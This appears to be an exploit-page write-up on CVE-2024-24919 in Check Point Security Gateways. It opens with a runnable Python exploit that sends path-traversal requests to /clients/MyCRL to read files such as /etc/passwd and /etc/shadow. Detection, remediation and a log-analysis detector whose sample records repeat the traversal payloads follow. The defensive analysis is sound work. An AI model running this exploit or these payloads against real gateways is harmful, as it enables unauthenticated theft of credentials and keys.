Check Point Security Gateway - Information Disclosure (Unauthenticated)

Exploit Author: Yesith Alvarez Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2024-05-31
# Exploit Title:  Check Point Security Gateway - Information Disclosure (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336
# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 
# CVE : CVE-2024-24919

import sys
import urllib3
from requests import Request, Session

# The appliance normally presents a self-signed certificate, so TLS
# verification is disabled below and the resulting urllib3 warning is muted.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def title():
    print('''
    
   _______      ________    ___   ___ ___  _  _        ___  _  _   ___  __  ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| || |      |__ \| || | / _ \/_ |/ _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______/ /|__   _\__, || |\__, |
 | |____   \  /  | |____    / /_| |_| / /_   | |       / /_   | |   / / | |  / / 
  \_____|   \/   |______|  |____|\___/____|  |_|      |____|  |_|  /_/  |_| /_/  
                                                                                 
                                                                          
                                                                                                                      
                                                                              
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
    ''')


def exploit(url, path):
    # The vulnerable handler is /clients/MyCRL. The POST body names an allowed
    # resource prefix (aCSHELL/) followed by enough "../" segments to climb to
    # the filesystem root, then the file requested on the command line.
    url = url.rstrip('/') + '/clients/MyCRL'
    data = "aCSHELL/../../../../../../../../../../.." + path
    headers = {
        'Connection': 'keep-alive',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'
    }
    s = Session()
    req = Request('POST', url, data=data, headers=headers)
    prepped = req.prepare()
    #del prepped.headers['Content-Type']
    resp = s.send(prepped, verify=False, timeout=15)
    print(prepped.headers)
    print(url)
    print(resp.headers)
    print(resp.status_code)
    # An affected gateway answers 200 with the requested file in the body;
    # a patched one returns an error status and no file content.
    print(resp.text)


if __name__ == '__main__':
    title()
    if len(sys.argv) < 3:
        print('[+] USAGE: python3 %s https://<target_url> path\n' % (sys.argv[0]))
        print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n' % (sys.argv[0]))
        sys.exit(0)
    exploit(sys.argv[1], sys.argv[2])


Check Point Security Gateway — CVE-2024-24919: Unauthenticated Information Disclosure

This article explains the Check Point Security Gateway information disclosure vulnerability tracked as CVE-2024-24919: what the issue is, which products are affected, the potential impact and attack scenarios, forensic and detection guidance, and the remediation and hardening steps security teams should follow. The analysis is defensive in focus; the proof-of-concept script above shows the shape of the request, and this section does not extend it.

Overview

CVE-2024-24919 is an information disclosure vulnerability in certain Check Point Security Gateway builds. It allows an unauthenticated remote actor to read files from the appliance via a web-facing endpoint (/clients/MyCRL) by sending a path-traversal payload in the request body. Check Point's advisory scopes the flaw to gateways with the Remote Access VPN or Mobile Access Software Blades enabled, and the company reported that exploitation attempts were observed in the wild before the fix was published. Because the vulnerability is triggered without credentials, gateways reachable from untrusted networks are at elevated risk.

Affected Products and CVE Details

Vendor:            Check Point
Product:           Security Gateway / Management components
Affected Versions: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20
CVE:               CVE-2024-24919

Always verify the latest affected lists and fixes on the vendor advisory page: https://support.checkpoint.com/results/sk/sk182336

Root Cause and Impact (High-Level)

  • The issue is an unauthenticated arbitrary file read through the /clients/MyCRL endpoint, which remote-access clients normally use to fetch CRLs and client packages.
  • Root cause: the handler accepts a requested resource name that begins with an allowed prefix (the proof of concept uses aCSHELL/) but does not canonicalize the remainder of the path, so "../" segments after the prefix escape the intended directory. The traversal is resolved with the privileges of the web process, which runs as root, so files such as /etc/shadow can be returned.
  • Potential impact: exposure of system files, product configuration, credential hashes, cryptographic material (VPN and SIC certificates, SSH host keys), or other data that supports credential attacks, device impersonation, and follow-on intrusion.

Likely Attack Scenarios (Defensive Perspective)

  • A remote attacker scans Internet-exposed gateways for /clients/MyCRL and POSTs traversal payloads to read password hashes, configuration, and secret material.
  • Check Point's incident reporting tied the exploitation to subsequent logins using old local VPN accounts that authenticate with a password only; hashes read from /etc/shadow are a direct route to such accounts.
  • Leaked artifacts (certificates, private keys, configuration files) can be used to impersonate devices, decrypt or establish VPN sessions, and pivot into internal network segments.

Detection and Indicators of Compromise (IoCs)

Focus on identifying anomalous access to web endpoints and abnormal data exfiltration patterns. Examples of safe, defensive search queries and indicators you can use in logs or SIEM:


# Example (search-oriented) pseudo-query for web access logs:
index=web_logs source=apache_access OR nginx_access
| search uri="/clients/MyCRL" OR uri="/clients/MyCRL*"
| stats count by client_ip, status, uri, _time
| where count > 10

Explanation: This pseudo-query highlights repeated access to the MyCRL endpoint and contains no exploit payload. Two caveats: web access logs rarely record POST bodies, so the query sees volume, not the traversal string itself; and /clients/MyCRL is a legitimate endpoint for remote-access clients, so a raw count threshold will fire on normal VPN client activity. Where a WAF, IDS, or TLS-terminating proxy captures request bodies, match on "../" sequences (including URL-encoded forms) following the aCSHELL/ prefix instead.

Other useful detection signals:

  • 200 responses from /clients/MyCRL whose body size or content does not match a CRL or client package (for example, text that looks like /etc/passwd or a configuration file).
  • Unusual POST body lengths or binary-like responses from the endpoint.
  • Access to /clients/MyCRL from IPs that have never established a VPN session, or from scanning infrastructure.
  • Sudden downloads of large textual configuration data from gateway or management hosts.
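The following is an added example, not part of the original analysis or of any Check Point tooling: a Python detector that runs over request records captured by a WAF, IDS, or TLS-terminating proxy in front of the gateway (the JSON-lines format, field names, and the log lines themselves are constructed for the example). It normalizes the POST body against single and double URL-encoding and backslash separators, flags bodies that traverse out of the allowed prefix on /clients/MyCRL, resolves which file each request actually targeted, and produces a per-source timeline of attempts versus files that were returned with a 200, which is the input the incident response steps later in this article need. The mapping from leaked file to rotation action is illustrative, not a list from the vendor advisory.

```python
import json
import posixpath
import re
from urllib.parse import unquote

VULN_ENDPOINT = "/clients/mycrl"
# A ".." path segment anywhere in the (normalized) requested name.
TRAVERSAL = re.compile(r"(^|/)\.\.(?=/|$)")

# Constructed sample records (JSON lines) in the style a WAF or proxy might
# export. Invented for this example; not logs from the page or a real appliance.
SAMPLE_RECORDS = r"""
{"ts": "2024-05-29T10:01:02Z", "src": "203.0.113.7", "method": "POST", "uri": "/clients/MyCRL", "status": 200, "body": "aCSHELL/../../../../../../../../../../../etc/shadow"}
{"ts": "2024-05-29T10:01:09Z", "src": "203.0.113.7", "method": "POST", "uri": "/clients/MyCRL", "status": 200, "body": "aCSHELL/..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"}
{"ts": "2024-05-29T10:02:00Z", "src": "198.51.100.4", "method": "GET", "uri": "/clients/MyCRL", "status": 200, "body": ""}
{"ts": "2024-05-29T10:02:30Z", "src": "198.51.100.4", "method": "POST", "uri": "/clients/MyCRL", "status": 200, "body": "aCSHELL/ICS.cab"}
{"ts": "2024-05-29T10:03:00Z", "src": "203.0.113.7", "method": "POST", "uri": "/clients/MyCRL", "status": 404, "body": "aCSHELL/..\\..\\..\\..\\..\\..\\..\\..\\etc/ssh/ssh_host_rsa_key"}
"""

# Illustrative triage table: what a read of this file means for the responder.
TRIAGE = [
    (re.compile(r"^/etc/shadow$"), "local password hashes: reset Gaia OS and local VPN account passwords"),
    (re.compile(r"^/etc/passwd$"), "account enumeration only; no secret disclosed"),
    (re.compile(r"^/etc/ssh/"), "SSH host keys: regenerate host keys"),
    (re.compile(r"\.(key|pem|p12|crt)$|/conf/"), "configuration or key material: rotate certificates and LDAP bind password"),
]


def normalize(body):
    """Undo up to three layers of URL-encoding and unify path separators,
    so encoded or backslash-separated traversals match the same regex."""
    s = body
    for _ in range(3):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s.replace("\\", "/")


def classify(target):
    for pattern, action in TRIAGE:
        if pattern.search(target):
            return action
    return "unclassified path: inspect manually"


def analyze(jsonl):
    """Return one finding per request that traverses out of the MyCRL prefix."""
    findings = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        if rec.get("uri", "").split("?", 1)[0].lower() != VULN_ENDPOINT:
            continue
        norm = normalize(rec.get("body") or "")
        if not TRAVERSAL.search(norm):
            continue  # ordinary CRL / client-package download
        # Resolve the name the way a root-anchored filesystem would: ".." above
        # "/" is dropped, which is exactly what lets the payload reach /etc.
        target = posixpath.normpath("/" + norm)
        findings.append({
            "ts": rec["ts"], "src": rec["src"], "status": rec["status"],
            "target": target,
            "exposed": rec["status"] == 200,  # 200 means the file was returned
            "triage": classify(target),
        })
    return findings


def summarize(findings):
    """Per-source timeline: first attempt, attempt count, files actually returned."""
    report = {}
    for f in findings:
        entry = report.setdefault(f["src"], {"first_seen": f["ts"], "attempts": 0, "exposed": set()})
        entry["first_seen"] = min(entry["first_seen"], f["ts"])
        entry["attempts"] += 1
        if f["exposed"]:
            entry["exposed"].add(f["target"])
    return report


if __name__ == "__main__":
    found = analyze(SAMPLE_RECORDS)
    for f in found:
        print(f"{f['ts']} {f['src']} -> {f['target']} ({f['status']}): {f['triage']}")
    for src, entry in summarize(found).items():
        print(src, entry["first_seen"], entry["attempts"], sorted(entry["exposed"]))
```

The benign GET and the aCSHELL/ICS.cab download from the second source produce no finding, which is the point of matching on the traversal rather than on the endpoint: legitimate VPN clients hit /clients/MyCRL constantly. The 404 on the SSH host key shows why status is recorded per finding; an attempt and a successful read call for different responses.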

Safe Testing and Verification (Non-Exploitative)

Do not perform unauthorised testing against production or third-party assets. For internal validation, create an isolated lab or test instance that mirrors your production configuration and apply the vendor-supplied patches there first.

Suggested verification approach (defensive):

  • Confirm the software version, build, and installed hotfixes on your Check Point systems using vendor-approved management tools or the product UI/API, and compare them against the fix list in the advisory.
  • Confirm whether the IPSec VPN or Mobile Access Software Blade is enabled; the advisory scopes the flaw to gateways running these blades, so a gateway without them is out of scope but should still be patched in the normal cycle.
  • Validate that the endpoint is not reachable from untrusted networks by scanning from your own trusted lab; a benign request to /clients/MyCRL (no traversal sequence) is enough to establish reachability.

Remediation & Mitigation

Immediate and planned steps for mitigating CVE-2024-24919:

  • Apply the official fix: Check Point published a hotfix for the supported releases listed in the advisory. Installing it is the primary remediation; EOL releases must be upgraded to a supported version first.
  • Treat exposed credentials as compromised: because the flaw reads any file as root, a gateway that was Internet-reachable while unpatched may have leaked /etc/shadow, configuration files, and key material. Rotate Gaia OS and local account passwords, the LDAP bind account the gateway uses, and VPN and SIC certificates, and regenerate SSH host keys.
  • Restrict network exposure: ensure management and gateway web interfaces are not directly reachable from the Internet. Use access-control lists and management-plane filtering to allow only trusted admin networks or IPs.
  • Harden administrative and VPN access: enable multi-factor authentication, retire local VPN accounts that authenticate with a password only, and enforce role separation and least-privilege administration.
  • Deploy IDS/IPS signatures: update intrusion prevention signatures from Check Point or your network security vendor to detect traversal attempts against /clients/MyCRL.
  • Monitor logs and alert on anomalous access patterns to the endpoint, including 200 responses whose size or content does not match a CRL.

Network-Level and Configuration Recommendations

  • Segment management interfaces into a dedicated management VLAN/subnet that is not routable from untrusted networks.
  • Use firewall rules to limit web-management traffic (HTTPS) to a small set of administrative IPs and subnets.
  • Disable or limit legacy/unused services on gateways and management servers.
  • Audit TLS certificates and private key storage; rotate keys if compromise is suspected.

Incident Response and Forensics

If you detect evidence of this vulnerability being exploited in your environment, follow incident response best practices:

  • Isolate affected hosts from the network segments accessible to attackers, while preserving volatile evidence.
  • Collect relevant logs: web server access/error logs, Check Point audit logs, VPN and system authentication logs, and network IDS traffic around the time of suspicious activity. Where request bodies were captured, record which files were requested and which requests returned 200; that list drives the credential and certificate rotation.
  • Preserve disk images and memory snapshots for forensic analysis when appropriate.
  • Look for secondary indicators—unexpected accounts, new firewall rules, or lateral movement to management subnets.
  • Coordinate with Check Point support and, where required, with legal and regulatory teams for disclosure and reporting obligations.

Hardening Checklist (Actionable but Non-Exploitative)

  • Keep Check Point appliances and management servers up to date with vendor security releases.
  • Restrict administrative web/UI access to specific management networks and use VPNs or jump hosts for remote admin access.
  • Enable strong authentication and centralize logging to a hardened SIEM.
  • Regularly audit configuration files, certificate storage, and user accounts for signs of misconfiguration or compromise.
  • Implement monitoring rules to alert on unusual downloads from management endpoints or repeated access attempts from unfamiliar IPs.

References and Further Reading

  • Check Point advisory and support article: https://support.checkpoint.com/results/sk/sk182336
  • CVE entry: CVE-2024-24919, https://nvd.nist.gov/vuln/detail/CVE-2024-24919
  • General secure operations guidance: network segmentation, patch management, and least privilege administration.

Maintaining visibility into management-plane activity and applying vendor patches promptly are the most effective controls against information disclosure flaws like CVE-2024-24919. If you suspect exposure, prioritize containment, evidence collection, and coordination with the vendor and incident response teams.